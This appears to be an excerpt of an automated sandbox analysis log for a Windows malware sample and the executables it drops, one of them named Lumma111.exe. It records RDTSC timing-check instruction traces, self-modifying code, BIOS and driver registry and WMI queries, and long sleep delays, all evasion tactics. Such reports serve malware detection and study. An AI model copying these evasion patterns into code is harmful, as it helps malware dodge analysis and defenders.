Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53801E8 second address: 53801EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53801EE second address: 53801F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53801F2 second address: 538020B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE420CEA00Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538020B second address: 538023A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE4211E2AC1h 0x00000009 add esi, 1FBA8886h 0x0000000f jmp 00007FE4211E2AC1h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538023A second address: 5380287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 and ecx, 1Fh 0x0000000a pushad 0x0000000b mov bx, si 0x0000000e push eax 0x0000000f pop esi 0x00000010 popad 0x00000011 ror eax, cl 0x00000013 pushad 0x00000014 mov ecx, ebx 0x00000016 pushfd 0x00000017 jmp 00007FE420CEA019h 0x0000001c sbb al, 00000046h 0x0000001f jmp 00007FE420CEA011h 0x00000024 popfd 0x00000025 popad 0x00000026 leave 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380287 second address: 538028B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538028B second address: 538029E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA00Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538029E second address: 53802DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b retn 0004h 0x0000000e nop 0x0000000f mov esi, eax 0x00000011 lea eax, dword ptr [ebp-08h] 0x00000014 xor esi, dword ptr [00A32014h] 0x0000001a push eax 0x0000001b push eax 0x0000001c push eax 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 push eax 0x00000021 call 00007FE425B72CA2h 0x00000026 push FFFFFFFEh 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FE4211E2AC8h 0x00000031 or ch, 00000078h 0x00000034 jmp 00007FE4211E2ABBh 0x00000039 popfd 0x0000003a mov si, 14AFh 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53802DE second address: 5380396 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA015h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b movzx eax, bx 0x0000000e pushfd 0x0000000f jmp 00007FE420CEA019h 0x00000014 and cx, D776h 0x00000019 jmp 00007FE420CEA011h 0x0000001e popfd 0x0000001f popad 0x00000020 ret 0x00000021 nop 0x00000022 push eax 0x00000023 call 00007FE42567A26Eh 0x00000028 mov edi, edi 0x0000002a pushad 0x0000002b push esi 0x0000002c pushfd 0x0000002d jmp 00007FE420CEA013h 0x00000032 add si, 9CAEh 0x00000037 jmp 00007FE420CEA019h 0x0000003c popfd 0x0000003d pop eax 0x0000003e call 00007FE420CEA011h 0x00000043 mov ecx, 3A000227h 0x00000048 pop eax 0x00000049 popad 0x0000004a push esp 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FE420CEA012h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380396 second address: 53803A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53803A5 second address: 53803BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE420CEA014h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53803BD second address: 53803C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53803C1 second address: 53803EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FE420CEA017h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53803EA second address: 5380419 instructions: 0x00000000 rdtsc 0x00000002 mov si, 2BC7h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FE4211E2ABCh 0x0000000d popad 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE4211E2AC7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330040 second address: 5330044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330044 second address: 5330059 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330059 second address: 5330073 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA011h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330073 second address: 5330090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov edx, 019E915Ch 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE4211E2ABDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330090 second address: 5330094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330094 second address: 533009A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533009A second address: 5330110 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE420CEA00Ah 0x00000009 sub cl, FFFFFFA8h 0x0000000c jmp 00007FE420CEA00Bh 0x00000011 popfd 0x00000012 mov ecx, 4359B89Fh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c jmp 00007FE420CEA012h 0x00000021 and esp, FFFFFFF8h 0x00000024 pushad 0x00000025 mov esi, 713104DDh 0x0000002a mov di, si 0x0000002d popad 0x0000002e xchg eax, ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FE420CEA011h 0x00000038 add cx, BF26h 0x0000003d jmp 00007FE420CEA011h 0x00000042 popfd 0x00000043 push ecx 0x00000044 pop edi 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330110 second address: 533012C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4211E2AC8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533012C second address: 5330130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330130 second address: 533014E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FE4211E2ABEh 0x0000000e xchg eax, ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533014E second address: 5330152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330152 second address: 5330158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330158 second address: 53301A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA014h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FE420CEA010h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 jmp 00007FE420CEA017h 0x00000017 mov si, A3DFh 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e mov bh, cl 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53301A4 second address: 53301C8 instructions: 0x00000000 rdtsc 0x00000002 call 00007FE4211E2AC7h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53301C8 second address: 53301D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA00Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53301D8 second address: 53301F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, ebx 0x00000011 mov edi, 323B3DA2h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53301F5 second address: 53301FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53301FB second address: 5330223 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FE4211E2ABEh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE4211E2ABEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330223 second address: 5330228 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330228 second address: 533027F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FE4211E2AC7h 0x0000000a jmp 00007FE4211E2AC3h 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 xchg eax, esi 0x00000014 jmp 00007FE4211E2AC6h 0x00000019 mov esi, dword ptr [ebp+08h] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f movsx edi, ax 0x00000022 movzx ecx, bx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533027F second address: 53302F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE420CEA00Eh 0x00000009 sub ax, 9888h 0x0000000e jmp 00007FE420CEA00Bh 0x00000013 popfd 0x00000014 mov bx, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, edi 0x0000001b pushad 0x0000001c call 00007FE420CEA010h 0x00000021 pushfd 0x00000022 jmp 00007FE420CEA012h 0x00000027 add ah, 00000018h 0x0000002a jmp 00007FE420CEA00Bh 0x0000002f popfd 0x00000030 pop esi 0x00000031 mov ax, dx 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FE420CEA00Ch 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53302F2 second address: 53302F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53302F6 second address: 53302FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53302FC second address: 5330372 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FE4211E2AC0h 0x0000000f test esi, esi 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FE4211E2ABEh 0x00000018 and ax, 4208h 0x0000001d jmp 00007FE4211E2ABBh 0x00000022 popfd 0x00000023 push ecx 0x00000024 pop eax 0x00000025 popad 0x00000026 je 00007FE492DE0D86h 0x0000002c jmp 00007FE4211E2AC1h 0x00000031 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FE4211E2ABDh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330372 second address: 5330406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA011h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FE4928E82AAh 0x0000000f pushad 0x00000010 movzx ecx, dx 0x00000013 jmp 00007FE420CEA019h 0x00000018 popad 0x00000019 mov edx, dword ptr [esi+44h] 0x0000001c jmp 00007FE420CEA00Eh 0x00000021 or edx, dword ptr [ebp+0Ch] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FE420CEA00Dh 0x0000002d or cl, 00000046h 0x00000030 jmp 00007FE420CEA011h 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007FE420CEA010h 0x0000003c add ah, FFFFFFE8h 0x0000003f jmp 00007FE420CEA00Bh 0x00000044 popfd 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330406 second address: 53304B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f jmp 00007FE4211E2ABEh 0x00000014 jne 00007FE492DE0D07h 0x0000001a pushad 0x0000001b jmp 00007FE4211E2ABEh 0x00000020 pushfd 0x00000021 jmp 00007FE4211E2AC2h 0x00000026 adc si, 05D8h 0x0000002b jmp 00007FE4211E2ABBh 0x00000030 popfd 0x00000031 popad 0x00000032 test byte ptr [esi+48h], 00000001h 0x00000036 jmp 00007FE4211E2AC6h 0x0000003b jne 00007FE492DE0CCCh 0x00000041 jmp 00007FE4211E2AC0h 0x00000046 test bl, 00000007h 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FE4211E2ABAh 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53304B2 second address: 53304C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA00Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53207F5 second address: 5320855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx ecx, di 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007FE4211E2AC6h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov ax, D2BDh 0x00000015 movzx ecx, dx 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b jmp 00007FE4211E2AC5h 0x00000020 and esp, FFFFFFF8h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FE4211E2AC8h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320855 second address: 5320864 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA00Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320864 second address: 53208B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 3ACAh 0x00000007 pushfd 0x00000008 jmp 00007FE4211E2ABBh 0x0000000d xor esi, 6312E56Eh 0x00000013 jmp 00007FE4211E2AC9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebx 0x0000001d jmp 00007FE4211E2ABEh 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov ebx, ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53208B1 second address: 53208B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A3E714 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: BE152B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A3E6FB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C63A9E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 10E714 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 2B152B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 10E6FB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 333A9E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Special instruction interceptor: First address: ED48C4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Special instruction interceptor: First address: 10A3D3B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Special instruction interceptor: First address: 1106AE5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Special instruction interceptor: First address: 3DBDEE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Special instruction interceptor: First address: 5B5FC8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Special instruction interceptor: First address: 59BC57 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Special instruction interceptor: First address: 3DBD39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Special instruction interceptor: First address: 610C82 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Special instruction interceptor: First address: 7CB9C9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Special instruction interceptor: First address: 97464B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Special instruction interceptor: First address: 9804FA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Special instruction interceptor: First address: A03CDE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Special instruction interceptor: First address: 5456CE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Special instruction interceptor: First address: 39D4F6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Special instruction interceptor: First address: 39F971 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Special instruction interceptor: First address: 5DDC42 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Special instruction interceptor: First address: B1DCAA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Special instruction interceptor: First address: B1DC37 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Memory allocated: 52E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Memory allocated: 5450000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Memory allocated: 7450000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_053A0E2D rdtsc 0_2_053A0E2D
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 860 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1013 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1778 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1105 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1102 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 383 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7704 Thread sleep time: -44022s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7688 Thread sleep count: 860 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7688 Thread sleep time: -1720860s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7684 Thread sleep count: 1013 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7684 Thread sleep time: -2027013s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7680 Thread sleep count: 1778 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7680 Thread sleep time: -3557778s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7692 Thread sleep count: 1105 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7692 Thread sleep time: -2211105s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7656 Thread sleep count: 290 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7656 Thread sleep time: -8700000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676 Thread sleep count: 1102 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676 Thread sleep time: -2205102s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7680 Thread sleep count: 383 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7680 Thread sleep time: -766383s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe TID: 7936 Thread sleep count: 33 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe TID: 7936 Thread sleep time: -66033s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe TID: 7944 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe TID: 7944 Thread sleep time: -72036s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe TID: 7960 Thread sleep count: 33 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe TID: 7960 Thread sleep time: -66033s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe TID: 7932 Thread sleep time: -32016s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe TID: 7940 Thread sleep time: -58029s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe TID: 6568 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe TID: 6692 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe TID: 6020 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe TID: 3704 Thread sleep time: -32016s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe TID: 1136 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe TID: 4868 Thread sleep time: -32016s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe TID: 1376 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe TID: 3448 Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Last function: Thread delayed
